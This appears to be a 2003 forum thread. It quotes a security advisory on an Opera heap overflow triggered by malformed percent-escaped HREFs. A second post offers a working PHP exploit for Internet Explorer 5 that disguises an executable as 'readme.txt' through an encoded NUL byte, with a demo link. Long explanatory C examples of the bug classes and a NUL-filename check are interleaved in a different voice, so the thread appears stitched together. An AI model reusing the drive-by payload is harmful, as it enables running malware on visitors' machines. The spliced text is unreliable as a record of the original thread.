Opera vulnerability ...

Tyby
Dungeon Keeper
Posts: 602
Joined: Sun Jul 06, 2003 10:39 pm
Location: Bucuresti


Postby Tyby » Mon Oct 20, 2003 7:26 pm

Well, well, so it happens to the smaller players too:

Advisory Name: Opera HREF escaped server name overflow
Release Date: 10/20/2003
Application: Opera 7.11, 7.20
Platform: Windows XP/2000 and GNU/Linux 2.4 tested, others
may be vulnerable
Severity: Remote code execution
Authors: Jesse Burns <jesse@atstake.com>
Vendor Status: Fixed in version 7.21
CVE Candidate: CAN-2003-0870
Reference: http://www.atstake.com/research/advisor ... 2003-1.txt


Overview:

The Opera browser exhibits a failure when rendering HTML. Certain
HREFs cause a buffer allocated on the heap to overflow. Arbitrary
bytes in the heap may be overwritten. This can result in the
compromise of systems running Opera. Opera's mail system seems to be
vulnerable also and recovery from reading an email is somewhat
difficult.

An attacker can send an email containing HTML to a user running the
Opera mail client and cause this overflow to occur when the HTML is
rendered. An owner of a web site can craft a malicious web page
containing the problematic HTML to cause an overflow on Opera
clients visiting the site.


Details:

Rendering HREFs with certain illegally escaped server names in the
URL will cause Opera to crash due to a buffer management problem.
Sometimes the crash is observed immediately, sometimes when the
browser is closed, presumably as the resources are being freed.

The escaped URLs are of the form:

<a href="file://server%%[many % characters]%%text" ></a>


Timeline:

09/29/2003 Opera contacted with details of issue
09/30/2003 Vendor responds that they have reproduced problem
10/15/2003 Vendor releases new version of program that includes a
fix
10/20/2003 Advisory released


Vendor Response:

Opera has released a new version of the software that is available
here:

http://www.opera.com/download/

The change log (http://www.opera.com/windows/changelogs/721/) notes
this fix as:

"Fixed a crash caused by illegally escaped server name"

There is no specific bulletin or warning to users that this release
contains security fixes.


Recommendation:

Upgrade to the 7.21 version of Opera browser for your platform.

Filter email to remove HTML. Run your web browser and mail client
as a low privileged user.
formerly known as gaurika ...

May the best from your past be the worst in your future!

Tyby out!
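The advisory says the malformed HREF overflows a heap buffer but not how. As an added illustration (hypothetical code written for this page, not Opera's implementation and not the @stake proof of concept), the C below models one way a percent-decoder gets this wrong: it sizes the heap buffer on the assumption that every "%" begins a well-formed "%XX" escape, while the decoder itself copies a stray "%" through literally, so a run of "%%" characters produces far more output than was allocated. The function names and sample URLs are constructed for the example; a strict decoder that rejects illegal escapes and sizes its buffer by the input length is shown beside it.

```c
/* Added example: percent-decoding a URL with a buffer sized by flawed
   arithmetic, beside a strict version. Hypothetical code illustrating the
   advisory's bug class; it is not Opera's implementation. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of a hex digit, or -1 if c is not one (including '\0'). */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Flawed size estimate: assumes every '%' begins a "%XX" escape, so each
   one shrinks three input bytes to one output byte. For "%%%%"-style input
   the estimate is far too small. (The caller is assumed to malloc() it.) */
size_t naive_decoded_size(const char *s)
{
    size_t len = strlen(s), pct = 0;
    for (const char *p = s; *p; p++)
        if (*p == '%') pct++;
    if (2 * pct > len)          /* subtraction would wrap size_t; clamp */
        return 1;
    return len - 2 * pct + 1;   /* +1 for the NUL terminator */
}

/* What a lenient decoder actually emits: a well-formed "%XX" becomes one
   byte; a '%' not followed by two hex digits is copied through unchanged. */
size_t lenient_decoded_len(const char *s)
{
    size_t i = 0, n = 0;
    while (s[i]) {
        if (s[i] == '%' && hexval((unsigned char)s[i + 1]) >= 0 &&
            hexval((unsigned char)s[i + 2]) >= 0)
            i += 3;
        else
            i += 1;
        n++;
    }
    return n;
}

/* Bytes the lenient decoder would write past a buffer of naive size
   (0 means the estimate was sufficient). Computed, never performed. */
size_t overflow_bytes(const char *url)
{
    size_t need = lenient_decoded_len(url) + 1;   /* plus NUL */
    size_t have = naive_decoded_size(url);
    return need > have ? need - have : 0;
}

/* Strict decoder: sizes the buffer by the input length (decoding never
   grows a string) and rejects any '%' not followed by two hex digits.
   Returns a malloc()ed string, or NULL for malformed input. */
char *decode_strict(const char *s)
{
    size_t len = strlen(s), o = 0;
    char *out = malloc(len + 1);
    if (!out) return NULL;
    for (size_t i = 0; i < len; ) {
        if (s[i] != '%') { out[o++] = s[i++]; continue; }
        int hi = hexval((unsigned char)s[i + 1]);
        int lo = hi < 0 ? -1 : hexval((unsigned char)s[i + 2]);
        if (hi < 0 || lo < 0) { free(out); return NULL; }
        out[o++] = (char)(hi * 16 + lo);
        i += 3;
    }
    out[o] = '\0';
    return out;
}

int main(void)
{
    /* Constructed inputs: the advisory's pattern, and a well-formed HREF. */
    const char *bad  = "file://server%%%%%%%%%%%%text";
    const char *good = "file://server%41%42/x";
    printf("naive size %zu, lenient output %zu, overflow %zu bytes\n",
           naive_decoded_size(bad), lenient_decoded_len(bad) + 1,
           overflow_bytes(bad));
    char *d = decode_strict(good);
    printf("strict(%s) = %s\n", good, d ? d : "(rejected)");
    free(d);
    printf("strict(%s) = %s\n", bad, decode_strict(bad) ? "accepted" : "(rejected)");
    return 0;
}
```

The overflow is never executed, only measured: for the 12-percent input the naive arithmetic allocates 6 bytes while the lenient decoder emits 30, which is the kind of heap corruption that shows up either at once or later, when the freed chunk's neighbours are walked.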


And so that we are not unfair:

Postby Tyby » Mon Oct 20, 2003 7:29 pm

IE remote code execution:

This code can execute any code remotely using IE; as you can see, it is very simple.

// for IE 5, tested on default Windows 98SE installation
<?php
// Declare a harmless media type for the response.
header("Content-type: audio/midi");
// The filename carries an encoded NUL (%00) between the name shown
// to the user and the real extension of the payload.
header("Content-Disposition: inline; filename=readme.txt%00code.exe");
// Send the executable as the response body.
readfile("code.exe");
?>

Here you have a demo:
http://r3b00t.tx.pl/iexec5.php

Can we expect more surprises like this one?


And this one is ugly ... try the link given ... there is nothing dangerous ... if the system is vulnerable, a window with "Windows 98 Version" etc. will appear .... if not, a download dialog for a program appears, and if you launch it the same thing appears:
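The trick in the quoted PHP rests on a filename that carries an encoded NUL byte. As an added illustration (hypothetical code written for this page, not part of the post, not the r3b00t demo and not a reconstruction of what IE 5 does internally), the C below shows why a consumer that treats the decoded filename as a C string sees only "readme.txt" while a length-aware consumer sees "code.exe", and the check a server-side or proxy filter should apply before any extension policy runs. The byte string and function names are constructed for the example.

```c
/* Added example: the same decoded filename seen as a C string versus as a
   length-counted byte string, plus the check that rejects embedded NULs.
   Hypothetical illustration of the trick in the post, not IE or PHP code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed input: the decoded form of "readme.txt%00code.exe". sizeof
   counts the embedded NUL and the terminator, so the real length is
   sizeof - 1 (19 bytes). */
static const char FILENAME[] = "readme.txt\0code.exe";
#define FILENAME_LEN (sizeof(FILENAME) - 1)

/* Extension as a NUL-terminated-string consumer sees it: strrchr stops at
   the first NUL, so it reports ".txt". Returns "" when there is no dot. */
const char *ext_cstring(const char *name)
{
    const char *dot = strrchr(name, '.');
    return dot ? dot : "";
}

/* Extension as a length-aware consumer sees it: scan the whole byte range
   backwards for the last '.', which here yields ".exe". */
const char *ext_bounded(const char *name, size_t len)
{
    for (size_t i = len; i-- > 0; )
        if (name[i] == '.') return name + i;
    return "";
}

/* Filter check: a filename containing a NUL is malformed. Reject it before
   any C-string based policy (extension allow-list, MIME mapping) gets a
   truncated view. Returns 1 if clean, 0 if it must be rejected. */
int filename_is_clean(const char *name, size_t len)
{
    return memchr(name, '\0', len) == NULL;
}

int main(void)
{
    printf("C-string view: %s\n", ext_cstring(FILENAME));
    printf("bounded view:  %s\n", ext_bounded(FILENAME, FILENAME_LEN));
    printf("clean: %d\n", filename_is_clean(FILENAME, FILENAME_LEN));
    return 0;
}
```

The two views disagree on the same bytes, which is exactly the gap the quoted PHP exploits; a filter that decodes the header value and then runs filename_is_clean() on the full byte length closes it.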

